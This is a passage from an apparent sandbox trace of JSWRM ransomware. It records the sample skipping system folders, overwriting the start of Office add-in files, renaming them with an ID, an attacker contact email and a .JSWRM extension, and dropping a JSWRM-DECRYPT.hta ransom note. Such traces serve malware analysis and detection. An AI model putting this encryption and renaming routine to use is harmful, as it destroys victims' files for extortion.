lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0124.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d698, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0124.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f970 [0124.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0124.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0124.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0124.023] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1341a2e5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1341a2e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1341a2e5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4edc8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.eu.xap", cAlternateFileName="POWERV~1.XAP")) returned 1 [0124.023] lstrcmpiW (lpString1="PowerViewRes.eu.xap", lpString2=".") returned 1 [0124.023] lstrcmpiW (lpString1="PowerViewRes.eu.xap", lpString2="..") returned 1 [0124.023] lstrcmpiW (lpString1="PowerViewRes.eu.xap", lpString2="...") returned 1 [0124.023] lstrcmpiW (lpString1="PowerViewRes.eu.xap", lpString2="windows") returned -1 [0124.023] lstrcmpiW (lpString1="PowerViewRes.eu.xap", lpString2="recovery") returned -1 [0124.023] lstrcmpiW (lpString1="PowerViewRes.eu.xap", lpString2="perflogs") returned 1 [0124.023] lstrcmpiW (lpString1="PowerViewRes.eu.xap", lpString2="documents and settings") returned 1 [0124.023] lstrcmpiW (lpString1="PowerViewRes.eu.xap", lpString2="$RECYCLE.BIN") returned 1 [0124.023] lstrcmpiW (lpString1="PowerViewRes.eu.xap", lpString2="system volume information") returned -1 [0124.023] lstrcmpiW (lpString1="PowerViewRes.eu.xap", lpString2="msocache") returned 1 [0124.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0124.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.eu.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0124.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0124.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.eu.xap", cchWideChar=19, lpMultiByteStr=0x240ef8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.eu.xap", lpUsedDefaultChar=0x0) returned 19 [0124.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0124.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0124.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.eu.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0124.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0124.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.eu.xap", cchWideChar=19, lpMultiByteStr=0x2410d8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.eu.xap", lpUsedDefaultChar=0x0) returned 19 [0124.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0124.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22df20 [0124.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0124.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0124.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0124.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0124.023] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\eu\\PowerViewRes.eu.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\eu\\powerviewres.eu.xap"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0124.024] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=323016) returned 1 [0124.024] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24f1e0 [0124.024] ReadFile (in: hFile=0x338, lpBuffer=0x24f1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesRead=0x345e1cc*=0x27100, lpOverlapped=0x0) returned 1 [0124.038] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.038] WriteFile (in: hFile=0x338, lpBuffer=0x24f1e0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesWritten=0x345e1c8*=0x27100, lpOverlapped=0x0) returned 1 [0124.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0124.039] CloseHandle (hObject=0x338) returned 1 [0124.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0124.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0124.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0124.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0124.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0124.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0124.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0124.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0124.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0124.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0124.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b398 [0124.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0124.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b398 | out: hHeap=0x1e0000) returned 1 [0124.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0124.039] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\eu\\PowerViewRes.eu.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\eu\\powerviewres.eu.xap"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\eu\\PowerViewRes.eu.xap.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\eu\\powerviewres.eu.xap.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0124.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0124.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0124.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0124.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0124.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0124.041] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1341a2e5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1341a2e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1341a2e5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4edc8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.eu.xap", cAlternateFileName="POWERV~1.XAP")) returned 0 [0124.041] FindClose (in: hFindFile=0x231ac0 | out: hFindFile=0x231ac0) returned 1 [0124.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22df20 | out: hHeap=0x1e0000) returned 1 [0124.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0124.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0124.042] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf18f9628, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x138defa8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x138defa8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="fi", cAlternateFileName="")) returned 1 [0124.042] lstrcmpiW (lpString1="fi", lpString2=".") returned 1 [0124.042] lstrcmpiW (lpString1="fi", lpString2="..") returned 1 [0124.042] lstrcmpiW (lpString1="fi", lpString2="...") returned 1 [0124.042] lstrcmpiW (lpString1="fi", lpString2="windows") returned -1 [0124.042] lstrcmpiW (lpString1="fi", lpString2="recovery") returned -1 [0124.042] lstrcmpiW (lpString1="fi", lpString2="perflogs") returned -1 [0124.042] lstrcmpiW (lpString1="fi", lpString2="documents and settings") returned 1 [0124.042] lstrcmpiW (lpString1="fi", lpString2="$RECYCLE.BIN") returned 1 [0124.042] lstrcmpiW (lpString1="fi", lpString2="system volume information") returned -1 [0124.042] lstrcmpiW (lpString1="fi", lpString2="msocache") returned -1 [0124.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0124.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0124.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0124.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0124.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0124.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0124.042] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\fi\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\fi\\jswrm-decrypt.hta")) returned 0xffffffff [0124.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0124.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0124.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0124.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0124.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24e1d8 [0124.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0124.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24ffa8 [0124.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0124.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0124.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0124.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0124.044] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\fi\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\fi\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0124.046] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.046] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0124.047] CloseHandle (hObject=0x314) returned 1 [0124.047] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0124.047] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ffa8 | out: hHeap=0x1e0000) returned 1 [0124.047] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0124.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0124.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0124.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0124.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0124.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0124.047] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0124.047] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\fi\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\fi\\jswrm-decrypt.hta")) returned 0x20 [0124.047] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0124.047] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0124.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0124.047] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\fi\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf18f9628, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x138defa8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4097d694, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231d40 [0124.047] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0124.047] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf18f9628, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x138defa8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4097d694, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0124.047] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0124.047] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0124.047] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf18f9628, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf18f9628, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x13977942, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc4258, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AdHocReportingExcelClient.dll", cAlternateFileName="ADHOCR~1.DLL")) returned 1 [0124.047] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2=".") returned 1 [0124.047] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="..") returned 1 [0124.047] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="...") returned 1 [0124.048] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="windows") returned -1 [0124.048] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="recovery") returned -1 [0124.048] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="perflogs") returned -1 [0124.048] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="documents and settings") returned -1 [0124.048] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.048] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="system volume information") returned -1 [0124.048] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="msocache") returned -1 [0124.048] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0124.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0124.048] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0124.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x2411f0, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0124.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0124.048] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0124.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0124.048] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0124.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x241380, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0124.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0124.048] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ad40 [0124.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0124.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0124.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0124.048] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4097d694, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4097d694, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x409a4a42, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0124.048] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0124.048] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0124.048] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0124.048] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0124.048] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0124.048] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0124.048] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0124.048] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0124.048] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0124.048] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0124.048] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0124.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0124.048] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0124.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0124.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0124.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0124.049] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0124.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0124.049] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241290, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0124.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0124.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0124.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ad40 | out: hHeap=0x1e0000) returned 1 [0124.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0124.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0124.049] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa5581c0, 